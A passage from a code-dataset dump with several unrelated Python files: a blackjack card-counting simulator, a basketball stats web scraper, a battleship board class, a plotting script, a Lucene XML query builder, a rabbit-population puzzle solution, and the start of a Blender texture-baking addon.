Blackjack.bet_tables_ace[no_ace_score][deal_shows]\r\n\r\n elif score <= 17:\r\n strat = self.bet_tables_no_ace_var[score][deal_shows]\r\n \r\n else:\r\n strat = 'Stand'\r\n\r\n if strat == 'Double':\r\n if len(self.players[playernumber][handnumber].deck_of_cards) == 2:\r\n strat = 'Double'\r\n else:\r\n strat = self.bet_tables_no_ace_var[score][deal_shows]\r\n if strat == 'Double':\r\n strat = 'Hit'\r\n\r\n return strat\r\n\r\n def count_card(self, card):\r\n if card.rank <=6 and card.rank>= 2:\r\n self.count = self.count+1\r\n elif card.rank == 1 or card.rank>=10:\r\n self.count = self.count-1\r\n\r\n if self.num_of_decks > 2:\r\n cards_remaining = float(len(self.deck.deck_of_cards))\r\n decks_remaining = cards_remaining/52.0\r\n tr_count = float(self.count)/decks_remaining\r\n self.true_count = int(tr_count)\r\n\r\n elif self.num_of_decks > 0 and self.num_of_decks <= 2:\r\n self.true_count = self.count\r\n\r\n def action(self,move,playernumber,handnumber = 0):\r\n\r\n if move == 'Hit':\r\n self.count_card(self.deck.deal_card(self.players[playernumber][handnumber],1))\r\n \r\n elif move == 'Double':\r\n self.count_card(self.deck.deal_card(self.players[playernumber][handnumber],1))\r\n self.did_double[playernumber][handnumber] = True\r\n self.double_count = self.double_count+1\r\n\r\n elif move == 'Split':\r\n newhand = Hand('splithand')\r\n self.players[playernumber].append(newhand)\r\n self.players[playernumber][handnumber].deal_card(self.players[playernumber][-1],1)\r\n self.count_card(self.deck.deal_card(self.players[playernumber][handnumber],1))\r\n self.count_card(self.deck.deal_card(self.players[playernumber][-1],1))\r\n self.hand_scores[playernumber].append([])\r\n self.did_double[playernumber].append(False)\r\n self.surrendered[playernumber].append(False)\r\n self.split_count = self.split_count+1\r\n\r\n\r\n\r\n def check_split(self,playernumber):\r\n hand_strategies = []\r\n did_split = False\r\n for handnumber in range(len(self.players[playernumber])):\r\n score = self.total_hand(playernumber,handnumber)\r\n strat = self.strategy(playernumber,handnumber,score)\r\n hand_strategies.append(strat)\r\n\r\n if 'Split' in hand_strategies:\r\n for handnumber in range(len(self.players[playernumber])):\r\n score = self.total_hand(playernumber,handnumber)\r\n strat = self.strategy(playernumber,handnumber,score)\r\n if strat == 'Split':\r\n self.action('Split',playernumber,handnumber)\r\n\r\n self.check_split(playernumber)\r\n did_split =True\r\n if did_split == True and self.players[playernumber][0].deck_of_cards[0].rank == 1:\r\n ace_split = True\r\n return ace_split\r\n else:\r\n ace_split = False\r\n return ace_split\r\n\r\n def check_insurance(self,dealer_shows,playernumber = 1):\r\n deal_shows_rank = dealer_shows.rank\r\n\r\n if deal_shows_rank == 1 and self.true_count >= 3 and self.use_count == True:\r\n self.Insurance = True\r\n self.winnings = self.winnings - 0.3*self.bet\r\n self.insurance_count = self.insurance_count+1\r\n\r\n \r\n\r\n def use_surrender(self,use_surrender):\r\n if use_surrender == True:\r\n Blackjack.surrender_table[16][1] = 'Surrender'\r\n Blackjack.surrender_table[16][9] = 'Surrender'\r\n Blackjack.surrender_table[16][10] = 'Surrender'\r\n Blackjack.surrender_table[15][10] = 'Surrender'\r\n\r\n def variations(self,count,use):\r\n\r\n self.bet_tables_no_ace_var = np.copy(Blackjack.bet_tables_no_ace)\r\n self.bet_tables_pairs_var = np.copy(Blackjack.bet_tables_pairs)\r\n\r\n if use == True and self.num_of_decks>2:\r\n for i in range(count+1):\r\n if i == 8:\r\n donothing = True\r\n elif i == 7:\r\n donothing =True\r\n elif i == 6:\r\n donothing = True\r\n elif i == 5:\r\n self.bet_tables_pairs_var[10][5] = 'Split'\r\n self.bet_tables_pairs_var[10][6] = 'Split'\r\n self.bet_tables_no_ace_var[16][9] = 'Stand'\r\n elif i == 4:\r\n self.bet_tables_no_ace_var[15][10] = 'Stand'\r\n self.bet_tables_no_ace_var[10][10] = 'Double'\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[10][1] = 'Double'\r\n self.bet_tables_no_ace_var[12][2] = 'Stand'\r\n self.bet_tables_no_ace_var[9][7] = 'Double'\r\n elif i == 3:\r\n if self.soft17hit == True:\r\n self.bet_tables_no_ace_var[10][1] = 'Double'\r\n elif i == 2:\r\n self.bet_tables_no_ace_var[12][3] = 'Stand' \r\n elif i == 1:\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[11][1] = 'Double'\r\n self.bet_tables_no_ace_var[9][2] = 'Double'\r\n elif i == 0:\r\n self.bet_tables_no_ace_var[12][4] = 'Stand'\r\n self.bet_tables_no_ace_var[16][10] = 'Stand'\r\n \r\n if self.true_count >= -1:\r\n self.bet_tables_no_ace_var[13][2] = 'Stand'\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[12][6] = 'Stand'\r\n if self.soft17hit == False:\r\n self.bet_tables_no_ace_var[11][1] = 'Double'\r\n self.bet_tables_no_ace_var[12][5] = 'Stand'\r\n if self.true_count >= -2: \r\n self.bet_tables_no_ace_var[13][3] = 'Stand'\r\n if self.count >= -3:\r\n if self.soft17hit == True:\r\n self.bet_tables_no_ace_var[12][6] = 'Stand'\r\n\r\n if use == True and self.use_surrender_variable == True:\r\n for i in range(count+2):\r\n if i == 4:\r\n Blackjack.surrender_table[14][10] = 'Surrender'\r\n if i == 3:\r\n Blackjack.surrender_table[15][9] = 'Surrender'\r\n if self.soft17hit == False:\r\n Blackjack.surrender_table[15][1] = 'Surrender'\r\n if i == 1:\r\n Blackjack.surrender_table[15][10] = 'Surrender'\r\n if i == 0 and self.soft17hit == True:\r\n Blackjack.surrender_table[15][1] = 'Surrender'\r\n\r\n def reset(self,reset_seed = False, random_seed=42):\r\n for i in range(len(self.players)):\r\n # print self.players[i]\r\n for n in range(len(self.players[i])):\r\n cards_to_discard = len(self.players[i][n].deck_of_cards)\r\n self.players[i][n].deal_card(self.discardpile,cards_to_discard)\r\n self.deck.shuffle(random_seed,reset_seed)\r\n \r\n while len(self.players[i]) > 1:\r\n self.players[i].pop()\r\n self.hand_scores[i].pop()\r\n self.did_double[i].pop()\r\n self.surrendered[i].pop()\r\n\r\n self.did_double[i][0] = False\r\n self.surrendered[1][0] = False\r\n\r\n\r\n self.round_scores = [0,0]\r\n self.count = 0\r\n self.true_count = 0\r\n self.winnings = 0.0\r\n self.bet = 10.0\r\n self.count_multiplier = 1\r\n self.blackjack_count = 0\r\n self.surrender_count = 0\r\n self.double_count = 0\r\n self.split_count = 0\r\n self.insurance_count = 0\r\n self.dealer_bust_count = 0\r\n self.soft17 = False\r\n self.count_array = []\r\n self.reshuffle_total = 0\r\n self.expected_count = 0\r\n self.start_value = 0\r\n self.max_count_array = []\r\n self.mean_count_array = []\r\n self.round_count = [0]\r\n\r\n","sub_path":"Card_Decks_Sp.py","file_name":"Card_Decks_Sp.py","file_ext":"py","file_size_in_byte":30381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"432868826","text":"from bs4 import BeautifulSoup as BS\r\nimport pandas\r\nimport requests\r\nimport json\r\nfrom lxml import html\r\n\r\nclass NewTeamCrawler:\r\n def __init__(self):\r\n self.result = []\r\n self.data = {}\r\n self.headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'}\r\n\r\n # 取得球隊名單及當年數據\r\n def GetData(self, url):\r\n dict = {\r\n \"rosters\": {},\r\n \"stats\": {}\r\n }\r\n # 取得球員名單\r\n dict[\"rosters\"] = pandas.read_html(url)[0].to_dict()\r\n # 取得球隊數據\r\n html = requests.get(url, headers = self.headers).text\r\n soup = BS(html, 'html.parser')\r\n placeholders = soup.find_all('div', {'class': 'placeholder'})\r\n table = None\r\n for title in placeholders:\r\n # get elements after placeholder and join in one string\r\n comment = ''.join(title.next_siblings)\r\n # parse comment\r\n soup_comment = BS(comment, 'html.parser')\r\n if soup_comment.find(id='team_and_opponent') != None:\r\n table = soup_comment.find(id='team_and_opponent')\r\n data = pandas.read_html(str(table))[0]\r\n dict[\"stats\"] = data.to_dict()\r\n break\r\n if table == None:\r\n dict[\"stats\"] = None\r\n return dict\r\n\r\n # 進入各球隊、各年,並加入List\r\n def process(self, index_start, index_final):\r\n i = 0\r\n for key, value in self.data.items():\r\n if i >= int(index_start):\r\n print(\"取得\" + key + \"資料中...\")\r\n dict = {}\r\n dict[\"name\"] = key\r\n for inner_key, inner_value in value.items():\r\n dict[inner_key] = self.GetData(inner_value)\r\n print(key + inner_key + \"完成!\")\r\n self.result.append(dict)\r\n print(key + \" Done!\")\r\n elif i > int(index_final):\r\n break\r\n i += 1\r\n\r\n # 取得各球隊各球季連結\r\n def GetEachYears(self, domain, url):\r\n temp = {}\r\n res = requests.get(url, headers = self.headers).text\r\n res = BS(res, 'lxml')\r\n links = res.select(\"tbody tr th a\") #取得各球季連結\r\n i = 0\r\n for link in links:\r\n temp[link.text] = domain + link.get('href')\r\n i += 1\r\n if i == 11: # 共取11季\r\n break\r\n return temp\r\n\r\n # 取得各球隊連結\r\n def GetTeamList(self):\r\n domain = \"https://www.basketball-reference.com\"\r\n res = requests.get(\"https://www.basketball-reference.com/teams/\").text\r\n res = BS(res, 'lxml')\r\n table = res.select('table')[0]\r\n links = table.select('a')\r\n for link in links:\r\n self.data[link.text] = self.GetEachYears(domain, domain + link.get('href'))\r\n print(link.text + \"取得各年連結!\")\r\n\r\n def openFile(self):\r\n fileName = './JSON/team_link.json'\r\n with open(fileName, 'r') as loadFile:\r\n self.data = json.load(loadFile)\r\n\r\n # 最後寫入檔案\r\n def save_to_json(self, name, data):\r\n file_name = \"./JSON/\" + name + \".json\"\r\n with open(file_name, 'w') as file_object:\r\n json.dump(data, file_object)\r\n print(file_name + \"完成!!!\")\r\n\r\nif __name__ == '__main__':\r\n crawler = NewTeamCrawler()\r\n index_start = input(\"請輸入想從第幾支球隊開始爬取,0~29:\")\r\n index_final = input(\"請輸入想爬取到第幾支球隊,0~29:\")\r\n file_name = input(\"請輸入輸出檔案名稱:\")\r\n #crawler.GetTeamList()\r\n #crawler.save_to_json(\"team_link\", crawler.data)\r\n crawler.openFile()\r\n crawler.process(index_start, index_final)\r\n crawler.save_to_json(file_name, crawler.result)\r\n","sub_path":"python/Crawler/teamCrawler.py","file_name":"teamCrawler.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10849085","text":"import globvars as g\n\n\nclass Board:\n def __init__(self):\n self.board = [{'fill': 'O', 'ship': None} for _ in range(100)]\n\n # Place the ship in board and also to the player's fleet list\n # for tracking the ship name\n # Validates the ship placement and returns the coordinates\n def place_ship(self, start, step, size, name):\n coordinates = []\n new_fill = g.HORIZONTAL_SHIP\n\n if step == 10:\n new_fill = g.VERTICAL_SHIP\n if start + step * size < 100:\n coordinates = [i*step+start for i in range(size)]\n else:\n return(\n 0,\n \", your {} needs at least {} spaces to fit!\\n\"\n \"Choose another location.\"\n )\n\n elif (10 - (start % 10)) >= size:\n coordinates = [i*(step)+start for i in range(size)]\n else:\n return(\n 0,\n \", your {} needs at least {} spaces to fit!\\n\"\n \"Choose another location.\"\n )\n\n for c in coordinates:\n if self.board[c]['fill'] != g.EMPTY:\n return(\n 0,\n \", your {} is in the way!\".format(self.board[c]['ship'])\n )\n\n for c in coordinates:\n self.board[c]['fill'] = new_fill\n self.board[c]['ship'] = name\n self.print_board()\n\n return(\n coordinates,\n \", your {} has been deployed!\"\n )\n\n def print_board_heading(self):\n print(\"\\n\"+\"_\" * 40+\"\\n\")\n columns = [chr(c) for c in range(ord('A'), ord('A') + g.BOARD_SIZE)]\n print(\" \"*11 + \" \".join(columns))\n\n def print_board(self):\n self.print_board_heading()\n\n row_num = 0\n while row_num <= 90:\n print(\n \" \"*8 +\n str(int(row_num/10) + 1).rjust(2) + \" \" + (\" \".join([\n self.board[i]['fill'] for i in range(row_num, row_num+10)\n ]\n )\n )\n )\n row_num += 10\n print(\"_\" * 40)\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"499890160","text":"'''\r\nCreated on 2017\r\n\r\n@author: Frankee\r\n'''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom matplotlib.ticker import MultipleLocator\r\n \r\ndef sgn(value):\r\n if value < 5:\r\n return 11.5 \r\n if value > 5 and value <= 14:\r\n return 13\r\n elif value > 14:\r\n return 15\r\n \r\ndef sgn1(value):\r\n if value < 2:\r\n return 10.2 \r\n if value > 2 and value <= 6:\r\n return 10.6\r\n elif value > 6 and value <= 9:\r\n return 12.2\r\n elif value > 9 and value <= 15:\r\n return 13.2\r\n elif value > 15:\r\n return 14.6\r\n\r\nplt.figure(figsize=(6,4)) \r\nx = np.linspace(0, 20, 100) \r\ny = np.array([]) \r\ny1 = np.array([]) \r\nfor a in x: \r\n y = np.append(y,np.linspace(sgn(a),sgn(a),1)) \r\n y1 = np.append(y1,np.linspace(sgn1(a),sgn1(a),1))\r\nl=plt.plot(x,y,'b',label='Optimal') \r\nl1=plt.plot(x,y1,'r',label='CherryPick') \r\n\r\nax = plt.gca()\r\nax.spines['right'].set_color('none') \r\nax.spines['top'].set_color('none') \r\n# ax.spines['bottom'].set_position(('data', 9)) \r\n# ax.spines['left'].set_position(('data',3)) \r\nxLocator = MultipleLocator(5)\r\nyLocator = MultipleLocator(0.5)\r\nax.set_xlim(0,20) \r\nax.set_ylim(10,16)\r\nax.xaxis.set_major_locator(xLocator)\r\nax.yaxis.set_major_locator(yLocator)\r\n\r\nax.set_xlabel('Generation')\r\nax.set_ylabel('Optimum')\r\nax.xaxis.set_ticks_position('bottom') \r\nax.yaxis.set_ticks_position('left') \r\n\r\nplt.legend()\r\n\r\nplt.show()","sub_path":"graph/src/Experiment2.py","file_name":"Experiment2.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504339051","text":"### -*- coding: utf-8 -*- #############################################\n# Разработано компанией Ключевые Решения (http://keysolutions.ru/) \n# Все права защищены, 2006-2007 \n#\n# Developed by Key Solutions (http://keysolutions.ru/) \n# All right reserved, 2006-2007 \n#######################################################################\n# Licensed under the Zope Public License, Version 2.1 (the \"License\"); you\n# may not use this file except in compliance with the License. A copy of the\n# License should accompany this distribution.\n#\n# This software distributed under the License is distributed on an \"AS IS\"\n# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n#######################################################################\n\"\"\"nuxeo.lucene.xmlquery for the Zope 3 package\n\n$Id$\n\"\"\"\n__author__ = \"Anatoly Bubenkov\"\n__license__\t= \"ZPL\"\n__version__ = \"$Revision$\"\n__date__ = \"$Date$\"\n__based_on__ = \"nuxeo.lucene.catalog http://www.nuxeo.org\"\n\nfrom nuxeo.lucene.xmlquery import XMLQuery, \\\n XMLSearchQuery, \\\n NXLuceneElement, \\\n logger, \\\n stringify\nfrom datetime import datetime\nimport base64\nfrom keydate import getStringFromDateTime, \\\n getDateTimeFromString\n \nRANGE_QUERY_FORMAT = \"[%s TO %s]\"\nimport cElementTree as etree\nimport sys\n\nclass KeyXMLQuery(XMLQuery):\n\n def __init__(self, objectAttributes, fieldconfs=()):\n\n self._doc = NXLuceneElement('doc')\n fields = NXLuceneElement('fields')\n for fieldconf in fieldconfs:\n\n ret = objectAttributes[fieldconf.attribute]\n\n if isinstance(ret, datetime):\n ret = getStringFromDateTime(ret)\n\n field = NXLuceneElement('field')\n\n field.attrib['id'] = fieldconf.name\n field.attrib['attribute'] = fieldconf.attribute\n field.attrib['type'] = fieldconf.type\n field.attrib['analyzer'] = fieldconf.analyzer\n\n value = ''\n if isinstance(ret, (list, tuple)):\n if fieldconf.type == 'Path':\n value = '/'.join(ret)\n else:\n value = '#'.join(stringify(v) for v in ret)\n else:\n value = ret\n\n # take care of int values\n if not isinstance(value, basestring):\n value = str(value)\n else:\n try:\n # decode from unicode, encode in utf-8\n value = value.encode('utf-8')\n except UnicodeDecodeError:\n # BBB\n value = str(value)\n # Base64 encoding.\n field.text = base64.b64encode(value)\n\n fields.append(field)\n self._doc.append(fields)\n \nclass KeyXMLSearchQuery(XMLSearchQuery):\n\n def __init__(self, return_fields=(), fieldconfs=(), options={}):\n\n self._doc = NXLuceneElement('search')\n\n # XXX make this configurable.\n ianalyzer = NXLuceneElement('analyzer')\n ianalyzer.text = 'standard'\n self._doc.append(ianalyzer)\n\n # Return fields\n ireturn_fields = NXLuceneElement('return_fields')\n for return_field in return_fields:\n ifield = NXLuceneElement('field')\n ifield.text = return_field\n ireturn_fields.append(ifield)\n self._doc.append(ireturn_fields)\n\n # fields\n ifields = NXLuceneElement('fields')\n for fieldconf in fieldconfs:\n\n k = fieldconf['id']\n v = fieldconf['value']\n t = fieldconf['type']\n c = fieldconf['condition']\n a = fieldconf['analyzer']\n u = fieldconf.get('usage', '')\n\n ifield = NXLuceneElement('field')\n\n ifield.attrib['id'] = k\n ifield.attrib['type'] = t\n ifield.attrib['condition'] = c\n ifield.attrib['analyzer'] = a\n ifield.attrib['usage'] = u\n\n if k + '_usage' in options.keys():\n # Get usage ZCatalog way for range query.\n # We strictly don't care about the ZCatalog\n # deprecation since it's quite handly in here.\n u = options.get(k+'_usage')\n ifield.attrib['usage'] = u\n\n # XXX change this. Hardcoded for now. Use a tokenizer\n # server side.\n if isinstance(v, str) or isinstance(v, unicode):\n ifield.attrib['value'] = v\n elif isinstance(v, list) or isinstance(v, tuple):\n if len(v) == 2:\n if v[0] is None and v[1] is None:\n continue\n elif isinstance(v[0], datetime) \\\n or isinstance(v[1], datetime):\n if v[0] is None:\n v = (datetime.min, v[1])\n elif v[1] is None:\n v = (v[0], datetime.max)\n v = tuple([getStringFromDateTime(i) for i in v])\n ifield.attrib['value'] = '#'.join(v)\n else:\n ifield.attrib['value'] = str(v)\n ifields.append(ifield)\n\n self._doc.append(ifields)\n\n # Batching start\n elt = NXLuceneElement('batch')\n\n b_start = options.get('b_start', 0)\n b_size = options.get('b_size', sys.maxint)\n\n elt.attrib['start'] = str(b_start)\n elt.attrib['size'] = str(b_size)\n \n self._doc.append(elt)\n\n # Operator\n op = options.get('operator')\n if op is not None:\n elt = NXLuceneElement('operator')\n elt.text = op\n self._doc.append(elt)\n\n # Sort\n elt = NXLuceneElement('sort')\n\n sort_on = options.get('sort-on')\n if sort_on is not None:\n subelt = NXLuceneElement('sort-on')\n subelt.text = sort_on\n elt.append(subelt)\n\n sort_limit = options.get('sort-limit')\n if sort_limit is not None:\n subelt = NXLuceneElement('sort-limit')\n subelt.text = str(sort_limit)\n elt.append(subelt)\n\n sort_order= options.get('sort-order')\n if sort_order is not None:\n subelt = NXLuceneElement('sort-order')\n subelt.text = str(sort_order)\n elt.append(subelt)\n\n self._doc.append(elt)\n\n def getStream(self):\n return etree.tostring(self._doc, encoding=\"UTF-8\")","sub_path":"keyindex/trunk/pyluceneindex/keyxmlquery.py","file_name":"keyxmlquery.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"326238430","text":"# Given: Positive integers n≤100 and m≤20.\n# Return: The total number of pairs of rabbits that will remain after the n-th month if all rabbits live for m months.\n\nn = int(input(\"Number of months: \"))\nm = int(input(\"Life expectancy (in months): \"))\nimmature = 1\nbreeding = 0\npop = [[0,1]]\nfor x in range(1,n):\n temp = immature\n immature = breeding\n if x > m-1:\n breeding = (breeding) + temp - pop[x-m][1]\n else:\n breeding = breeding + temp\n pop.append([breeding, immature])\nprint(pop[n-1][0]+pop[n-1][1])\n","sub_path":"11-FIBD.py","file_name":"11-FIBD.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"376059506","text":"#this script is dedicated to the public domain under CC0 (https://creativecommons.org/publicdomain/zero/1.0/)\n#do whatever you want with it! -Bram\n\nbl_info = {\n \"name\": \"BRM_BakeUI\",\n \"category\": \"3D View\",\n \"blender\": (2, 80, 0),\n \"author\": \"Bram Eulaers\",\n \"description\": \"Simple texture baking UI for fast iteration. Can be found in the Tools panel.\"\n }\n\nimport bpy\nimport os\nimport bmesh\nfrom bpy.props import EnumProperty, BoolProperty, StringProperty, FloatProperty, IntProperty\n\n\n\ndef unhide(objectType):\n if bpy.data.objects.get(objectType) is None:\n for o in bpy.data.collections[objectType].objects:\n o.hide_viewport = False\n else:\n bpy.data.objects[objectType].hide_viewport = False\n\ndef hide(objectType):\n if bpy.data.objects.get(objectType) is None:\n for o in bpy.data.collections[objectType].objects:\n o.hide_viewport = True\n else:\n bpy.data.objects[objectType].hide_viewport = True\n\n\nclass BRM_BakeUIPanel(bpy.types.Panel):\n \"\"\"BRM_BakeUIPanel Panel\"\"\"\n bl_label = \"BRM Bake\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = \"UI\"\n bl_category = \"Bake\"\n\n\n def draw_header(self, _):\n layout = self.layout\n layout.label(text=\"\", icon='SCENE')\n\n def draw(self, context):\n layout = self.layout\n\n box = layout.box()\n col = box.column(align=True)\n\n row = col.row(align = True)\n row.prop(context.scene, \"lowpolyGroup\", text=\"\", icon=\"GROUP\")\n if context.scene.lowpolyGroup is True:\n row.prop_search(context.scene, \"lowpoly\", bpy.data, \"collections\", text=\"\", icon=\"MESH_ICOSPHERE\")\n if context.scene.lowpolyGroup is False:\n row.prop_search(context.scene, \"lowpoly\", context.scene, \"objects\", text=\"\", icon=\"MESH_ICOSPHERE\")\n \n \n\n if context.scene.lowpolyActive is True:\n hideicon = \"HIDE_OFF\"\n if context.scene.lowpolyActive is False:\n hideicon = \"HIDE_ON\"\n op = row.operator(\"brm.bakeuihide\", text=\"\", icon=hideicon)\n op.targetmesh = \"lowpoly\"\n \n row = col.row(align = True)\n\n row.prop(context.scene, \"hipolyGroup\", text=\"\", icon=\"GROUP\")\n if context.scene.hipolyGroup is True:\n row.prop_search(context.scene, \"hipoly\", bpy.data, \"collections\", text=\"\", icon=\"MESH_UVSPHERE\")\n if context.scene.hipolyGroup is False:\n row.prop_search(context.scene, \"hipoly\", context.scene, \"objects\", text=\"\", icon=\"MESH_UVSPHERE\")\n\n row.enabled = not context.scene.UseLowOnly\n \n \n\n if context.scene.hipolyActive is True:\n hideicon = \"HIDE_OFF\"\n if context.scene.hipolyActive is False:\n hideicon = \"HIDE_ON\"\n op = row.operator(\"brm.bakeuihide\", text=\"\", icon=hideicon)\n op.targetmesh = \"hipoly\"\n\n \n\n col = box.column(align=True)\n row = col.row(align = True)\n row.operator(\"brm.bakeuitoggle\", text=\"Toggle hi/low\", icon=\"FILE_REFRESH\")\n #row.prop(context.scene, \"UseBlenderGame\", icon=\"MESH_UVSPHERE\", text=\"\")\n\n col = layout.column(align=True)\n\n col.separator()\n row = col.row(align = True)\n row.prop(context.scene.render.bake, \"cage_extrusion\", text=\"Ray Distance\")\n row.prop(context.scene, \"cageEnabled\", icon=\"OBJECT_DATAMODE\", text=\"\")\n row = col.row(align = True)\n #row.enabled = context.scene.cageEnabled\n \n if context.scene.cageEnabled:\n op = row.prop_search(context.scene, \"cage\", bpy.data, \"objects\", text=\"\", icon=\"MESH_UVSPHERE\")\n #op.enabled = context.scene.cageEnabled\n \n col.separator()\n\n box = layout.box()\n col = box.column(align=True)\n\n row = col.row(align = True)\n row.label(text=\"Width:\")\n row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"REMOVE\").target = \"width/2\"\n row.prop(context.scene, \"bakeWidth\", text=\"\")\n row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"ADD\").target = \"width*2\"\n \n row = col.row(align = True)\n row.label(text=\"Height:\")\n row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"REMOVE\").target = \"height/2\"\n row.prop(context.scene, \"bakeHeight\", text=\"\")\n row.operator(\"brm.bakeuiincrement\", text=\"\", icon=\"ADD\").target = \"height*2\"\n row = col.row(align = True)\n row.label(text=\"Padding:\")\n row.prop(context.scene.render.bake, \"margin\", text=\"\")\n \n \n\n col = layout.column(align=True)\n col.separator()\n col.prop(context.scene, 'bakeFolder', text=\"\")\n row = col.row(align = True)\n row.label(text=\"Filename:\")\n row.prop(context.scene, \"bakePrefix\", text=\"\")\n \n col.separator()\n\n box = layout.box()\n col = box.column(align=True)\n \n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeNormal\", icon=\"SHADING_RENDERED\", text=\"Tangent Normal\")\n if context.scene.bakeNormal:\n row.prop(context.scene, \"samplesNormal\", text=\"\")\n\n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeObject\", icon=\"SHADING_RENDERED\", text=\"Object Normal\")\n if context.scene.bakeObject:\n row.prop(context.scene, \"samplesObject\", text=\"\")\n row = col.row(align = True)\n row.prop(context.scene, \"bakeAO\", icon=\"SHADING_SOLID\", text=\"Occlusion\")\n if context.scene.bakeAO:\n row.prop(context.scene, \"samplesAO\", text=\"\")\n \n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeColor\", icon=\"SHADING_TEXTURE\", text=\"Color\")\n if context.scene.bakeColor:\n row.prop(context.scene, \"samplesColor\", text=\"\")\n\n row = col.row(align = True)\n row.enabled = not context.scene.UseLowOnly\n row.prop(context.scene, \"bakeRoughness\", icon=\"SHADING_TEXTURE\", text=\"Roughness\")\n if context.scene.bakeRoughness:\n row.prop(context.scene, \"samplesRoughness\", text=\"\")\n\n row = col.row(align = True)\n row.prop(context.scene, \"bakeUV\", icon=\"SHADING_WIRE\", text=\"UV Snapshot\")\n \n \n \n col = layout.column(align=True)\n col.separator()\n row = col.row(align = True)\n op = row.operator(\"brm.bake\", text=\"BAKE\", icon=\"RENDER_RESULT\")\n row.prop(context.scene, \"UseLowOnly\", icon=\"MESH_ICOSPHERE\", text=\"\")\n \n\n\n\n\n\n\n\n\n\n\n\nclass BRM_BakeUIToggle(bpy.types.Operator):\n \"\"\"toggle lowpoly/hipoly\"\"\"\n bl_idname = \"brm.bakeuitoggle\"\n bl_label = \"Toggle\"\n bl_options = {\"UNDO\"}\n\n def execute(self, context):\n\n if bpy.context.object.mode == 'EDIT':\n bpy.ops.object.mode_set(mode='OBJECT')\n\n #test lowpoly/hipoly exists\n if bpy.data.objects.get(context.scene.lowpoly) is None and not context.scene.lowpoly in bpy.data.collections:\n self.report({'WARNING'}, \"Select a valid lowpoly object or group!\")\n return {'FINISHED'}\n if bpy.data.objects.get(context.scene.hipoly) is None and not context.scene.hipoly in bpy.data.collections:\n self.report({'WARNING'}, \"Select a valid hipoly object or group!\")\n return {'FINISHED'}\n\n if context.scene.lowpolyActive is True:\n context.scene.lowpolyActive = False\n hide(context.scene.lowpoly)\n context.scene.hipolyActive = True\n unhide(context.scene.hipoly)\n else:\n context.scene.lowpolyActive = True\n unhide(context.scene.lowpoly)\n context.scene.hipolyActive = False\n hide(context.scene.hipoly)\n\n return {'FINISHED'}\n\n\n\n\n\n\n\nclass BRM_BakeUIIncrement(bpy.types.Operator):\n \"\"\"multiply/divide value\"\"\"\n bl_idname = \"brm.bakeuiincrement\"\n bl_label = \"increment\"\n\n target = bpy.props.StringProperty()\n\n def execute(self, context):\n if self.target == \"width/2\" and context.scene.bakeWidth > 4:\n context.scene.bakeWidth = context.scene.bakeWidth / 2\n if self.target == \"width*2\":\n context.scene.bakeWidth = context.scene.bakeWidth * 2\n if self.target == \"height/2\" and context.scene.bakeHeight > 4:\n context.scene.bakeHeight = context.scene.bakeHeight / 2\n if self.target == \"height*2\":\n context.scene.bakeHeight = context.scene.bakeHeight * 2\n return {'FINISHED'}\n\n\n\n\n\n\n\n\n\n\n\n\nclass BRM_BakeUIHide(bpy.types.Operator):\n \"\"\"hide object\"\"\"\n bl_idname = \"brm.bakeuihide\"\n bl_label = \"hide\"\n bl_options = {\"UNDO\"}\n\n targetmesh = bpy.props.StringProperty()\n\n def execute(self, context):\n\n #test lowpoly/hipoly exists\n \n if bpy.context.object.mode == 'EDIT':\n bpy.ops.object.mode_set(mode='OBJECT')\n \n\n if self.targetmesh == \"lowpoly\":\n\n if bpy.data.objects.get(context.scene.lowpoly) is None and not context.scene.lowpoly in bpy.data.collections:\n self.report({'WARNING'}, \"Select a valid lowpoly object or collection!\")\n return {'FINISHED'}\n\n else:\n if context.scene.lowpolyActive is True:\n context.scene.lowpolyActive = False\n hide(context.scene.lowpoly)\n else:\n context.scene.lowpolyActive = True\n unhide(context.scene.lowpoly)\n\n if self.targetmesh == \"hipoly\":\n\n if bpy.data.objects.get(context.scene.hipoly) is None and not context.scene.hipoly in bpy.data.collections:\n self.report({'WARNING'}, \"Select a valid hipoly object or collection!\")\n return {'FINISHED'}\n\n else:\n if context.scene.hipolyActive is True:\n context.scene.hipolyActive = False\n hide(context.scene.hipoly)\n else:\n context.scene.hipolyActive = True\n unhide(context.scene.hipoly)\n\n return {'FINISHED'}\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass BRM_Bake(bpy.types.Operator):\n \"\"\"Bake and save textures\"\"\"\n bl_idname = \"brm.bake\"\n bl_label = \"set normal\"\n bl_options = {\"UNDO\"}\n \n\n def execute(self, context): \n \n #test if everything is set up OK first:\n #test folder\n hasfolder = os.access(context.scene.bakeFolder, os.W_OK)\n if hasfolder is False:\n self.report({'WARNING'}, \"Select a valid export folder!\")\n return {'FINISHED'}\n\n\n #test lowpoly/hipoly/cage exists\n if 